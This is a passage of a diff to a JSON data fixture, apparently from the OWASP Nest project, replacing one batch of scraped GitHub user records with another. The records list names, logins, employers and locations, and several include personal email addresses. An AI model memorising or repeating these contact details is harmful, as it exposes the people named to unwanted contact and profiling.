"public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-01-08T14:46:12Z", - "updated_at": "2024-08-27T10:35:58Z", - "node_id": "MDQ6VXNlcjc3MTYwMjgz", + "following_count": 14, + "followers_count": 419, + "public_gists_count": 17, + "public_repositories_count": 169, + "created_at": "2012-11-30T17:36:09Z", + "updated_at": "2024-08-06T21:16:13Z", + "node_id": "MDQ6VXNlcjI5MzI3ODY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394228,99 +651727,99 @@ }, { "model": "github.user", - "pk": 1360, + "pk": 6633, "fields": { - "nest_created_at": "2024-09-11T23:23:15.261Z", - "nest_updated_at": "2024-09-11T23:23:15.261Z", - "name": "I Putu Ariyasa", - "login": "rucciva", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4647473?v=4", - "company": "PT. Telekomunikasi Indonesia", - "location": "", + "nest_created_at": "2024-09-22T07:47:22.249Z", + "nest_updated_at": "2024-09-22T18:49:55.620Z", + "name": "TJ Holowaychuk", + "login": "tj", + "email": "tj@apex.sh", + "avatar_url": "https://avatars.githubusercontent.com/u/25254?v=4", + "company": "Apex", + "location": "London, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 45, - "created_at": "2013-06-08T11:16:32Z", - "updated_at": "2024-09-07T02:24:24Z", - "node_id": "MDQ6VXNlcjQ2NDc0NzM=", + "following_count": 45, + "followers_count": 50785, + "public_gists_count": 551, + "public_repositories_count": 296, + "created_at": "2008-09-18T22:37:28Z", + "updated_at": "2024-01-17T09:23:36Z", + "node_id": "MDQ6VXNlcjI1MjU0", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "tjholowaychuk" } }, { "model": "github.user", - "pk": 1361, + "pk": 6634, "fields": { - "nest_created_at": "2024-09-11T23:23:16.953Z", - "nest_updated_at": "2024-09-11T23:23:16.953Z", - "name": "jeroendee", - "login": "jeroendee", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/220023?v=4", - "company": "Quality Shepherd", - "location": "Amsterdam", + "nest_created_at": "2024-09-22T07:47:22.564Z", + "nest_updated_at": "2024-09-22T19:33:24.239Z", + "name": "Sorin Sbarnea", + "login": "ssbarnea", + "email": "sorin.sbarnea@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/102495?v=4", + "company": "Red Hat @ansible", + "location": "Norwich, UK", "collaborators_count": 0, - "following_count": 25, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2010-03-10T18:45:13Z", - "updated_at": "2024-08-21T09:44:54Z", - "node_id": "MDQ6VXNlcjIyMDAyMw==", - "bio": "", + "following_count": 390, + "followers_count": 506, + "public_gists_count": 141, + "public_repositories_count": 358, + "created_at": "2009-07-07T12:25:03Z", + "updated_at": "2024-07-31T10:08:15Z", + "node_id": "MDQ6VXNlcjEwMjQ5NQ==", + "bio": "Principal Software Engineer @ansible DevTools Team Lead during working hours and python tamer during his free time, loves open-source and upstream work.", "is_hireable": false, - "twitter_username": "jeroendee" + "twitter_username": "sbarnea" } }, { "model": "github.user", - "pk": 1362, + "pk": 6635, "fields": { - "nest_created_at": "2024-09-11T23:23:19.870Z", - "nest_updated_at": "2024-09-11T23:24:48.321Z", - "name": "Lunzi1992", - "login": "monkeylijin", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26971206?v=4", + "nest_created_at": "2024-09-22T07:47:22.875Z", + "nest_updated_at": "2024-09-22T18:49:56.241Z", + "name": "", + "login": "Siphalor", + "email": "info@siphalor.de", + "avatar_url": "https://avatars.githubusercontent.com/u/24505659?v=4", "company": "", - "location": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2017-04-06T15:14:52Z", - "updated_at": "2024-08-30T00:38:07Z", - "node_id": "MDQ6VXNlcjI2OTcxMjA2", - "bio": "", + "following_count": 11, + "followers_count": 29, + "public_gists_count": 1, + "public_repositories_count": 88, + "created_at": "2016-12-11T11:08:58Z", + "updated_at": "2024-08-04T13:04:01Z", + "node_id": "MDQ6VXNlcjI0NTA1NjU5", + "bio": "A Java developer, mostly doing Minecraft modding here.\r\nAlso occasionally working with other languages such as Rust, Python and JS.\r\n\r\nGNU Terry Pratchett", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1363, + "pk": 6636, "fields": { - "nest_created_at": "2024-09-11T23:23:20.711Z", - "nest_updated_at": "2024-09-11T23:23:20.711Z", - "name": "", - "login": "CameronGo", + "nest_created_at": "2024-09-22T07:47:23.184Z", + "nest_updated_at": "2024-09-22T18:49:56.550Z", + "name": "Pragna Gopa", + "login": "pragnagopa", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14074983?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1874279?v=4", + "company": "Microsoft", + "location": "Redmond", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 38, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2015-09-01T13:52:37Z", - "updated_at": "2024-09-03T13:46:12Z", - "node_id": "MDQ6VXNlcjE0MDc0OTgz", + "public_repositories_count": 63, + "created_at": "2012-06-20T21:31:12Z", + "updated_at": "2024-09-16T15:40:52Z", + "node_id": "MDQ6VXNlcjE4NzQyNzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394328,24 +651827,24 @@ }, { "model": "github.user", - "pk": 1364, + "pk": 6637, "fields": { - "nest_created_at": "2024-09-11T23:23:21.924Z", - "nest_updated_at": "2024-09-11T23:23:21.924Z", - "name": "", - "login": "alex1891", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22732183?v=4", + "nest_created_at": "2024-09-22T07:47:23.503Z", + "nest_updated_at": "2024-09-22T18:49:56.868Z", + "name": "Piotr Tomiak", + "login": "piotrtomiak", + "email": "piotr.tomiak@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4244523?v=4", "company": "", - "location": "", + "location": "Bielsko-Biała, Poland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 30, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-10-09T19:38:27Z", - "updated_at": "2024-06-12T09:14:53Z", - "node_id": "MDQ6VXNlcjIyNzMyMTgz", + "public_repositories_count": 41, + "created_at": "2013-04-24T11:09:01Z", + "updated_at": "2024-08-21T08:38:38Z", + "node_id": "MDQ6VXNlcjQyNDQ1MjM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394353,99 +651852,174 @@ }, { "model": "github.user", - "pk": 1365, + "pk": 6638, "fields": { - "nest_created_at": "2024-09-11T23:23:22.728Z", - "nest_updated_at": "2024-09-12T02:08:28.850Z", - "name": "Juris Lambda", - "login": "jxlambda", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/61850441?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:47:23.820Z", + "nest_updated_at": "2024-09-22T18:49:57.173Z", + "name": "Pete Woods", + "login": "pete-woods", + "email": "email@pete-woods.com", + "avatar_url": "https://avatars.githubusercontent.com/u/152569?v=4", + "company": "@circleci", + "location": "United Kingdom", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-03-05T21:19:09Z", - "updated_at": "2024-09-02T07:39:10Z", - "node_id": "MDQ6VXNlcjYxODUwNDQx", - "bio": "", + "following_count": 5, + "followers_count": 38, + "public_gists_count": 4, + "public_repositories_count": 90, + "created_at": "2009-11-12T23:07:48Z", + "updated_at": "2024-08-16T22:04:24Z", + "node_id": "MDQ6VXNlcjE1MjU2OQ==", + "bio": "[Remote] Java/GoLang/C++ Engineer into DevOps, universally interested in technology @circleci ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1366, + "pk": 6639, "fields": { - "nest_created_at": "2024-09-11T23:23:23.545Z", - "nest_updated_at": "2024-09-11T23:23:23.545Z", - "name": "", - "login": "emacampolo", - "email": "emanuel.campolo@mercadolibre.com", - "avatar_url": "https://avatars.githubusercontent.com/u/43819854?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:47:24.124Z", + "nest_updated_at": "2024-09-22T18:49:57.501Z", + "name": "Andrew Arnott", + "login": "AArnott", + "email": "andrewarnott@live.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3548?v=4", + "company": "Microsoft", + "location": "Longmont, CO ", "collaborators_count": 0, - "following_count": 3, - "followers_count": 18, - "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2018-10-03T14:57:34Z", - "updated_at": "2024-08-22T21:52:53Z", - "node_id": "MDQ6VXNlcjQzODE5ODU0", + "following_count": 7, + "followers_count": 1227, + "public_gists_count": 56, + "public_repositories_count": 265, + "created_at": "2008-03-21T16:24:38Z", + "updated_at": "2024-09-21T22:06:25Z", + "node_id": "MDQ6VXNlcjM1NDg=", + "bio": "I work for Microsoft on the Visual Studio Platform team by day, and an FOSS developer by night. Crypto donations gratefully accepted (see my keybase profile).", + "is_hireable": false, + "twitter_username": "aarnott" + } +}, +{ + "model": "github.user", + "pk": 6640, + "fields": { + "nest_created_at": "2024-09-22T07:47:24.436Z", + "nest_updated_at": "2024-09-22T18:49:57.828Z", + "name": "Brett Samblanet", + "login": "brettsam", + "email": "brettsam@microsoft.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1089915?v=4", + "company": "Microsoft Corporation", + "location": "Cincinnati, OH", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 64, + "public_gists_count": 18, + "public_repositories_count": 48, + "created_at": "2011-09-29T13:39:19Z", + "updated_at": "2024-09-19T16:50:54Z", + "node_id": "MDQ6VXNlcjEwODk5MTU=", "bio": "", - "is_hireable": true, - "twitter_username": "" + "is_hireable": false, + "twitter_username": "brett_sam" } }, { "model": "github.user", - "pk": 1367, + "pk": 6641, "fields": { - "nest_created_at": "2024-09-11T23:23:24.379Z", - "nest_updated_at": "2024-09-11T23:23:24.379Z", - "name": "Sven", - "login": "svenschwermer", + "nest_created_at": "2024-09-22T07:47:24.752Z", + "nest_updated_at": "2024-09-22T18:49:58.140Z", + "name": "Dotan Simha", + "login": "dotansimha", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7867606?v=4", - "company": "@disruptive-technologies ", + "avatar_url": "https://avatars.githubusercontent.com/u/3680083?v=4", + "company": "@the-guild-org", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 57, - "created_at": "2014-06-12T06:50:30Z", - "updated_at": "2024-08-09T11:57:23Z", - "node_id": "MDQ6VXNlcjc4Njc2MDY=", - "bio": "", + "following_count": 207, + "followers_count": 1868, + "public_gists_count": 20, + "public_repositories_count": 144, + "created_at": "2013-02-23T17:28:08Z", + "updated_at": "2024-09-11T13:45:36Z", + "node_id": "MDQ6VXNlcjM2ODAwODM=", + "bio": "CTO @the-guild-org", + "is_hireable": false, + "twitter_username": "dotansimha" + } +}, +{ + "model": "github.user", + "pk": 6642, + "fields": { + "nest_created_at": "2024-09-22T07:47:25.071Z", + "nest_updated_at": "2024-09-22T18:49:58.457Z", + "name": "Florian Wilhelm", + "login": "fwilhe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2292245?v=4", + "company": "@SAP SE", + "location": "Potsdam", + "collaborators_count": 0, + "following_count": 487, + "followers_count": 88, + "public_gists_count": 28, + "public_repositories_count": 66, + "created_at": "2012-09-06T13:51:45Z", + "updated_at": "2024-06-10T05:07:16Z", + "node_id": "MDQ6VXNlcjIyOTIyNDU=", + "bio": "Software Developer. I am employed by SAP, but thoughts here are my own.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1368, + "pk": 6643, "fields": { - "nest_created_at": "2024-09-11T23:23:25.176Z", - "nest_updated_at": "2024-09-11T23:23:25.176Z", - "name": "", - "login": "victorc-cylus", + "nest_created_at": "2024-09-22T07:47:25.380Z", + "nest_updated_at": "2024-09-22T18:49:58.763Z", + "name": "Gareth Jones", + "login": "G-Rath", + "email": "Jones258@Gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3151613?v=4", + "company": "@ackama", + "location": "New Zealand", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 67, + "public_gists_count": 8, + "public_repositories_count": 104, + "created_at": "2012-12-30T04:23:50Z", + "updated_at": "2024-07-29T07:46:57Z", + "node_id": "MDQ6VXNlcjMxNTE2MTM=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6644, + "fields": { + "nest_created_at": "2024-09-22T07:47:25.702Z", + "nest_updated_at": "2024-09-22T18:49:59.068Z", + "name": "Gerrit Birkeland", + "login": "Gerrit0", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/155533262?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/19329837?v=4", "company": "", - "location": "", + "location": "United States, Colorado", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-01-03T09:52:02Z", - "updated_at": "2024-01-03T09:52:02Z", - "node_id": "U_kgDOCUU_zg", + "following_count": 3, + "followers_count": 64, + "public_gists_count": 18, + "public_repositories_count": 80, + "created_at": "2016-05-12T15:16:55Z", + "updated_at": "2024-09-19T03:00:42Z", + "node_id": "MDQ6VXNlcjE5MzI5ODM3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394453,24 +652027,24 @@ }, { "model": "github.user", - "pk": 1369, + "pk": 6645, "fields": { - "nest_created_at": "2024-09-11T23:23:26.418Z", - "nest_updated_at": "2024-09-11T23:23:26.418Z", - "name": "Suvarna", - "login": "super3programmer", + "nest_created_at": "2024-09-22T07:47:26.011Z", + "nest_updated_at": "2024-09-22T18:49:59.406Z", + "name": "Jan Pilzer", + "login": "Hirse", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53504717?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2564094?v=4", + "company": "@microsoft ", + "location": "Redmond, USA", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, + "following_count": 0, + "followers_count": 80, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2019-07-31T04:14:03Z", - "updated_at": "2024-09-11T08:36:13Z", - "node_id": "MDQ6VXNlcjUzNTA0NzE3", + "public_repositories_count": 19, + "created_at": "2012-10-15T12:39:55Z", + "updated_at": "2024-09-17T11:22:08Z", + "node_id": "MDQ6VXNlcjI1NjQwOTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394478,24 +652052,24 @@ }, { "model": "github.user", - "pk": 1370, + "pk": 6646, "fields": { - "nest_created_at": "2024-09-11T23:23:27.641Z", - "nest_updated_at": "2024-09-14T19:27:15.459Z", - "name": "Skripka Andrey", - "login": "andriiskripka", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14906847?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:47:26.320Z", + "nest_updated_at": "2024-09-22T18:49:59.715Z", + "name": "Jonas Bushart", + "login": "jonasbb", + "email": "jonas@bushart.org", + "avatar_url": "https://avatars.githubusercontent.com/u/273459?v=4", + "company": "@lhsystems", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 6, - "created_at": "2015-09-30T12:43:38Z", - "updated_at": "2024-08-29T09:57:51Z", - "node_id": "MDQ6VXNlcjE0OTA2ODQ3", + "following_count": 9, + "followers_count": 56, + "public_gists_count": 3, + "public_repositories_count": 48, + "created_at": "2010-05-11T15:26:28Z", + "updated_at": "2024-07-31T21:25:20Z", + "node_id": "MDQ6VXNlcjI3MzQ1OQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394503,24 +652077,24 @@ }, { "model": "github.user", - "pk": 1371, + "pk": 6647, "fields": { - "nest_created_at": "2024-09-11T23:23:28.461Z", - "nest_updated_at": "2024-09-18T18:56:58.534Z", - "name": "", - "login": "shusriva", + "nest_created_at": "2024-09-22T07:47:26.641Z", + "nest_updated_at": "2024-09-22T18:50:00.024Z", + "name": "Kevin Hudemann", + "login": "KevinHudemann", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/35764437?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61827895?v=4", + "company": "@SAP", + "location": "Berlin, Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-01-24T10:31:50Z", - "updated_at": "2024-08-12T15:28:06Z", - "node_id": "MDQ6VXNlcjM1NzY0NDM3", + "public_repositories_count": 3, + "created_at": "2020-03-05T10:26:17Z", + "updated_at": "2024-08-07T11:11:42Z", + "node_id": "MDQ6VXNlcjYxODI3ODk1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394528,49 +652102,49 @@ }, { "model": "github.user", - "pk": 1372, + "pk": 6648, "fields": { - "nest_created_at": "2024-09-11T23:24:05.599Z", - "nest_updated_at": "2024-09-11T23:24:05.599Z", - "name": "Adam Hošek", - "login": "mamuf", + "nest_created_at": "2024-09-22T07:47:26.949Z", + "nest_updated_at": "2024-09-22T18:50:00.346Z", + "name": "Matthias Oßwald", + "login": "matz3", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/382484?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1410947?v=4", + "company": "@SAP", + "location": "Germany", "collaborators_count": 0, - "following_count": 3, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2010-08-31T20:16:35Z", - "updated_at": "2024-03-21T10:19:27Z", - "node_id": "MDQ6VXNlcjM4MjQ4NA==", + "following_count": 117, + "followers_count": 150, + "public_gists_count": 1, + "public_repositories_count": 31, + "created_at": "2012-02-05T23:17:01Z", + "updated_at": "2024-02-02T22:37:25Z", + "node_id": "MDQ6VXNlcjE0MTA5NDc=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "matthiaso" } }, { "model": "github.user", - "pk": 1373, + "pk": 6649, "fields": { - "nest_created_at": "2024-09-11T23:24:06.462Z", - "nest_updated_at": "2024-09-11T23:24:06.462Z", - "name": "Justin Rogers", - "login": "kuporific", + "nest_created_at": "2024-09-22T07:47:27.256Z", + "nest_updated_at": "2024-09-22T18:50:00.668Z", + "name": "Naren Soni", + "login": "soninaren", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4064195?v=4", - "company": "Verato", + "avatar_url": "https://avatars.githubusercontent.com/u/8119379?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 18, "public_gists_count": 2, - "public_repositories_count": 7, - "created_at": "2013-04-05T00:27:39Z", - "updated_at": "2023-10-27T17:38:30Z", - "node_id": "MDQ6VXNlcjQwNjQxOTU=", + "public_repositories_count": 52, + "created_at": "2014-07-10T00:34:05Z", + "updated_at": "2024-09-18T12:05:59Z", + "node_id": "MDQ6VXNlcjgxMTkzNzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394578,24 +652152,49 @@ }, { "model": "github.user", - "pk": 1374, + "pk": 6650, + "fields": { + "nest_created_at": "2024-09-22T07:47:27.611Z", + "nest_updated_at": "2024-09-22T18:50:00.999Z", + "name": "Pavel Odvody", + "login": "shaded-enmity", + "email": "pavel@redhat.com", + "avatar_url": "https://avatars.githubusercontent.com/u/572844?v=4", + "company": "Red Hat", + "location": "Brno", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 26, + "public_gists_count": 19, + "public_repositories_count": 161, + "created_at": "2011-01-19T16:09:45Z", + "updated_at": "2024-04-12T09:57:26Z", + "node_id": "MDQ6VXNlcjU3Mjg0NA==", + "bio": "0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6651, "fields": { - "nest_created_at": "2024-09-11T23:24:08.262Z", - "nest_updated_at": "2024-09-11T23:24:08.262Z", - "name": "", - "login": "midav7", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40424976?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:47:27.922Z", + "nest_updated_at": "2024-09-22T18:50:01.319Z", + "name": "Christopher Cook", + "login": "cookch10", + "email": "cookch10@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6051695?v=4", + "company": "PublicisSapient", + "location": "USA", "collaborators_count": 0, - "following_count": 5, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2018-06-20T09:27:25Z", - "updated_at": "2023-12-28T17:10:32Z", - "node_id": "MDQ6VXNlcjQwNDI0OTc2", + "following_count": 11, + "followers_count": 9, + "public_gists_count": 8, + "public_repositories_count": 12, + "created_at": "2013-11-27T16:23:49Z", + "updated_at": "2024-09-12T00:52:06Z", + "node_id": "MDQ6VXNlcjYwNTE2OTU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394603,49 +652202,49 @@ }, { "model": "github.user", - "pk": 1375, + "pk": 6652, "fields": { - "nest_created_at": "2024-09-11T23:24:09.137Z", - "nest_updated_at": "2024-09-11T23:24:09.137Z", - "name": "", - "login": "ollieSayer", + "nest_created_at": "2024-09-22T07:47:28.250Z", + "nest_updated_at": "2024-09-22T18:50:01.640Z", + "name": "Matt Carroll", + "login": "develogix", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26251421?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/151043?v=4", "company": "", - "location": "", + "location": "Atlanta, GA, USA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-03-07T13:22:23Z", - "updated_at": "2024-04-15T07:38:23Z", - "node_id": "MDQ6VXNlcjI2MjUxNDIx", - "bio": "", - "is_hireable": false, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2009-11-10T00:42:28Z", + "updated_at": "2020-11-17T18:07:53Z", + "node_id": "MDQ6VXNlcjE1MTA0Mw==", + "bio": "Car nerd, music nerd, and... actual nerd.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1376, + "pk": 6653, "fields": { - "nest_created_at": "2024-09-11T23:24:09.954Z", - "nest_updated_at": "2024-09-11T23:24:09.954Z", - "name": "Jörn Gebhardt", - "login": "gebhardt", + "nest_created_at": "2024-09-22T07:47:28.556Z", + "nest_updated_at": "2024-09-22T18:50:01.964Z", + "name": "Mike B.", + "login": "pubmikeb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1846035?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/17231333?v=4", "company": "", - "location": "Weingarten, Germany", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 4, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2012-06-13T10:29:36Z", - "updated_at": "2024-09-04T08:49:52Z", - "node_id": "MDQ6VXNlcjE4NDYwMzU=", + "public_repositories_count": 0, + "created_at": "2016-02-14T09:09:58Z", + "updated_at": "2024-07-13T23:40:23Z", + "node_id": "MDQ6VXNlcjE3MjMxMzMz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394653,49 +652252,49 @@ }, { "model": "github.user", - "pk": 1377, + "pk": 6654, "fields": { - "nest_created_at": "2024-09-11T23:24:10.790Z", - "nest_updated_at": "2024-09-11T23:24:10.790Z", - "name": "", - "login": "relnah", + "nest_created_at": "2024-09-22T07:47:28.900Z", + "nest_updated_at": "2024-09-22T18:50:02.354Z", + "name": "NN", + "login": "NN---", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6702680?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/580536?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2014-02-17T08:23:48Z", - "updated_at": "2024-05-21T14:36:01Z", - "node_id": "MDQ6VXNlcjY3MDI2ODA=", + "followers_count": 22, + "public_gists_count": 17, + "public_repositories_count": 111, + "created_at": "2011-01-24T10:40:32Z", + "updated_at": "2024-09-13T11:33:49Z", + "node_id": "MDQ6VXNlcjU4MDUzNg==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1378, + "pk": 6655, "fields": { - "nest_created_at": "2024-09-11T23:24:11.594Z", - "nest_updated_at": "2024-09-18T18:56:20.073Z", - "name": "", - "login": "malice00", + "nest_created_at": "2024-09-22T07:47:29.238Z", + "nest_updated_at": "2024-09-22T18:50:02.710Z", + "name": "Omkar More", + "login": "omkarmore83", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12972577?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20553064?v=4", + "company": "Microsoft", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2015-06-19T22:14:41Z", - "updated_at": "2024-06-17T20:09:30Z", - "node_id": "MDQ6VXNlcjEyOTcyNTc3", + "public_repositories_count": 14, + "created_at": "2016-07-20T07:29:00Z", + "updated_at": "2024-01-22T22:17:43Z", + "node_id": "MDQ6VXNlcjIwNTUzMDY0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394703,174 +652302,174 @@ }, { "model": "github.user", - "pk": 1379, + "pk": 6656, "fields": { - "nest_created_at": "2024-09-11T23:24:12.871Z", - "nest_updated_at": "2024-09-11T23:24:12.871Z", - "name": "Tarun Anand", - "login": "tr0nand", - "email": "anandtarun2@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/22257379?v=4", - "company": "", + "nest_created_at": "2024-09-22T07:47:29.547Z", + "nest_updated_at": "2024-09-22T18:50:03.036Z", + "name": "Patrik", + "login": "zepatrik", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5354445?v=4", + "company": "@ory ", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 24, - "created_at": "2016-09-17T13:16:29Z", - "updated_at": "2024-08-29T18:00:26Z", - "node_id": "MDQ6VXNlcjIyMjU3Mzc5", - "bio": "", + "following_count": 34, + "followers_count": 141, + "public_gists_count": 4, + "public_repositories_count": 58, + "created_at": "2013-08-31T17:55:36Z", + "updated_at": "2024-09-09T14:21:56Z", + "node_id": "MDQ6VXNlcjUzNTQ0NDU=", + "bio": "Full-time maintainer at @ory. Usually either hacking or :bicyclist: :swimmer: :climbing:", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1380, + "pk": 6657, "fields": { - "nest_created_at": "2024-09-11T23:24:13.722Z", - "nest_updated_at": "2024-09-12T02:08:30.472Z", - "name": "Drew Thompson", - "login": "officerNordberg", + "nest_created_at": "2024-09-22T07:47:29.855Z", + "nest_updated_at": "2024-09-22T20:31:11.469Z", + "name": "Peter Benjamin", + "login": "pbnj", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/901470?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6811830?v=4", "company": "", - "location": "", + "location": "San Diego, CA", "collaborators_count": 0, - "following_count": 10, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2011-07-07T20:33:42Z", - "updated_at": "2024-07-25T16:28:00Z", - "node_id": "MDQ6VXNlcjkwMTQ3MA==", - "bio": "", + "following_count": 501, + "followers_count": 302, + "public_gists_count": 25, + "public_repositories_count": 105, + "created_at": "2014-02-28T03:04:16Z", + "updated_at": "2024-08-29T14:49:36Z", + "node_id": "MDQ6VXNlcjY4MTE4MzA=", + "bio": "{Security,Infrastructure} engineer. {Rust,Go} enthusiast. Kubernetes herder.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1381, + "pk": 6658, "fields": { - "nest_created_at": "2024-09-11T23:24:14.544Z", - "nest_updated_at": "2024-09-11T23:24:14.544Z", - "name": "Ivo Hedtke", - "login": "hedtke", + "nest_created_at": "2024-09-22T07:47:30.161Z", + "nest_updated_at": "2024-09-22T18:50:03.674Z", + "name": "Sander Hahn", + "login": "sanderhahn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/726611?v=4", - "company": "DB Schenker @dbschenker ", - "location": "Essen, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/775103?v=4", + "company": "@sander-io ", + "location": "Amsterdam Area", "collaborators_count": 0, - "following_count": 0, - "followers_count": 8, - "public_gists_count": 1, - "public_repositories_count": 7, - "created_at": "2011-04-13T08:54:48Z", - "updated_at": "2024-08-13T15:28:27Z", - "node_id": "MDQ6VXNlcjcyNjYxMQ==", - "bio": "Head of Operations Research", + "following_count": 31, + "followers_count": 43, + "public_gists_count": 5, + "public_repositories_count": 47, + "created_at": "2011-05-08T11:23:05Z", + "updated_at": "2024-04-17T10:31:09Z", + "node_id": "MDQ6VXNlcjc3NTEwMw==", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "sanderhahn" } }, { "model": "github.user", - "pk": 1382, + "pk": 6659, "fields": { - "nest_created_at": "2024-09-11T23:24:15.383Z", - "nest_updated_at": 